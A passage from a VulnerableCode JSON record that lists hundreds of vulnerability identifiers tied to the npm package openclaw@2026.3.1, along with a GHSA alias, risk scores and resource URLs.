":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability
":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability
":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability
":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability
":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-x82f-27x3-q89c"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zm2t-r33r-fffy"}],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}